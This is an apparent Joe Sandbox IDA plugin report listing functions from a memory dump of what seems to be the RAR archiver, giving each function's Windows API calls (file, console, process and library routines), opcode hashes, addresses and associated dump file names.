Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID:
API String ID: 3094578987-0
Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction ID: 9e66d2c9e77d18b27624825f13e9f5e41579e0e4546f4a7d4171a67a3c2bca1d
Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction Fuzzy Hash: 28F0672D508A4582EB20AF11F9440B9B360FB89B99F844132DEBE066A9CF2CD556CB60

Function 00007FF7F7EE2488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7F7EE246C), ref: 00007FF7F7EE24B0
TerminateProcess.KERNEL32(?,?,?,00007FF7F7EE246C), ref: 00007FF7F7EE24BB
ExitProcess.KERNEL32 ref: 00007FF7F7EE24CA

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction ID: 69a8403ba2a1db41cbfbf82bf917a06765eb8722b7d77d92776738cc1358d22a
Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction Fuzzy Hash: BBE01A28A08B0542FB44BF209C813B963566F84741F85583ACC2F023D2CE3DA40A83A2

Function 00007FF7F7E97B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,00007FF7F7E97A9E), ref: 00007FF7F7E97B4A
GetFileType.KERNELBASE(?,?,?,00007FF7F7E97A9E), ref: 00007FF7F7E97B56
GetConsoleMode.KERNEL32(?,?,?,00007FF7F7E97A9E), ref: 00007FF7F7E97B69

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ConsoleFileHandleModeType
String ID:
API String ID: 4141822043-0
Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction ID: 024e1fa16180b56348d8dbffc7d292ce9b1404754d3ec55b3f5512ffa217a4b7
Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction Fuzzy Hash: BBE08C2CF0660242EB586721A8652B883629F5DB90FC01036D83F4ABD0EE2C949A8360

Function 00007FF7F7EA4044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON

Download Yara Rule

APIs

OemToCharA.USER32 ref: 00007FF7F7EA4255
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000,?,?,?,?,?,00007FF7F7E86CD9), ref: 00007FF7F7EA447C

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CharEnvironmentExpandStrings
String ID:
API String ID: 4052775200-0
Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
Instruction ID: 189e67b214cf7d33b81549ce9c397ec790235da666919d89befcd82cdaa61995
Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
Instruction Fuzzy Hash: 5AE1C42AE1868285FB30AB6894401BDE7A0FB52794F944132DBAE076D9DF7CD44BC790

Function 00007FF7F7EA1AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF7F7E97EBE,00000000,00000000,00000000,00000000,00000007,00007FF7F7E97C48), ref: 00007FF7F7EA1B8D
CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF7F7E97EBE,00000000,00000000,00000000,00000000,00000007,00007FF7F7E97C48), ref: 00007FF7F7EA1BD7

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction ID: 3ba38f9bde00dbdb8e1f22fd35cbf4ea691e696af0af0440ad996cede42720af
Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction Fuzzy Hash: 09315967A1874186F770AF14E4053A9A7A0EB41BB8F904336DD7D066C5DF7CC586C790

Function 00007FF7F7E8681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F7E868AE
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7E868BF

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction ID: 356f2b2e013e2d26a6348510eb45caf1af566d8720d57ca9131b44afc79b148e
Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction Fuzzy Hash: 31218457908E8582DB019F29D5410B86360FB98B88B58A321DF5D43757EF38E5E6C350

Function 00007FF7F7EB915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7F7EB91CA
new.LIBCMT ref: 00007FF7F7EB91F2

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302f4e927f3bd5b43f1168eb9d42450f56f5141e75014634f46cae096db8b2c1
Instruction ID: 5c1f22a051e7288b93212ce11202f8e6d79c482950586292d107c35d7b95d436
Opcode Fuzzy Hash: 302f4e927f3bd5b43f1168eb9d42450f56f5141e75014634f46cae096db8b2c1
Instruction Fuzzy Hash: E011E935609B8181EB10FB68E5443A9F3A4EF85794F940236D6BE073E6DE7CD452C360

Function 00007FF7F7EA20B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00007FF7F7EA22EE), ref: 00007FF7F7EA211B
GetLastError.KERNEL32(?,?,?,00007FF7F7EA22EE), ref: 00007FF7F7EA2126

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction ID: ad5a7f8389f92190dc24f1d25eb559aa84fabaea883b182e1e08c9366c537812
Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction Fuzzy Hash: 09012929B1968141FB646B25A800069E365EF94BF0F949232DE3F03FD0CF3CD4429750

Function 00007FF7F7E97A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

setbuf.LIBCMT ref: 00007FF7F7E97A7B

Part of subcall function 00007FF7F7EE2AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE7EF3

setbuf.LIBCMT ref: 00007FF7F7E97A8F

Part of subcall function 00007FF7F7E97B44: GetStdHandle.KERNEL32(?,?,?,00007FF7F7E97A9E), ref: 00007FF7F7E97B4A
Part of subcall function 00007FF7F7E97B44: GetFileType.KERNELBASE(?,?,?,00007FF7F7E97A9E), ref: 00007FF7F7E97B56
Part of subcall function 00007FF7F7E97B44: GetConsoleMode.KERNEL32(?,?,?,00007FF7F7E97A9E), ref: 00007FF7F7E97B69

Part of subcall function 00007FF7F7EE2ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE2AD0

Part of subcall function 00007FF7F7EE2B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE2C1C

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
String ID:
API String ID: 4044681568-0
Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
Instruction ID: bac26f6d6550a72cf2d4e0571268a0bac43023dbaf3d377c9e152d3589d6c440
Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
Instruction Fuzzy Hash: FB011708E1958205FB18B7B514663B9968A4F95360FC1893AE03F0A3D3ED5C245783F6

Function 00007FF7F7EA2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF7F7EA2480
GetLastError.KERNEL32 ref: 00007FF7F7EA248D

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction ID: d077da79237af0fdb191281338d1e0e6f81dae7a8c47e686e33467ef4c521ab6
Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction Fuzzy Hash: 4201A126A18A4281FB64BB39E4402B8A360EB80778F944332D53E015E5CF7CD587C7A0

Function 00007FF7F7EA30C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000800,00007FF7F7EA305D,?,?,?,?,?,?,?,?,00007FF7F7EB4126,?,?,?,?,00000800), ref: 00007FF7F7EA30F0
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7F7EB4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7F7EA3119

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction ID: cf863b22eb429de75f3ff621d3e6b0aededdc7f66ea81419ff8f3a8452d753b7
Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction Fuzzy Hash: 6CF0A429B18A8181EB60AB64F4843A9A390BB4D7D4FC00132E9BE837D5DE6CD5464650

Function 00007FF7F7ECB3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32 ref: 00007FF7F7ECB41E
LoadLibraryW.KERNELBASE ref: 00007FF7F7ECB449

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction ID: 415922f739fc4a2228365a727df70732499b1426d1f1e08f9a6cde88aa6e755b
Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction Fuzzy Hash: D1F06829B1858181F770AB10E8553F5A364BF48784FC00032E9EE866D5EE2CD646CAA0

Function 00007FF7F7ECBA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F7ECBACD), ref: 00007FF7F7ECBA74
GetProcessAffinityMask.KERNEL32 ref: 00007FF7F7ECBA87

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction ID: f2af3f6547f7edd9b7fd3a0f9c2831fd279b237667af32e0013f6c417ab5b5ed
Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction Fuzzy Hash: 20E02B24B3446142DBD9A719C491FA96390AF44B80FC02036F45BC3E94ED1CC5458B50

Function 00007FF7F7EE4A74 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL ref: 00007FF7F7EE4A8A
GetLastError.KERNEL32 ref: 00007FF7F7EE4A9C

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
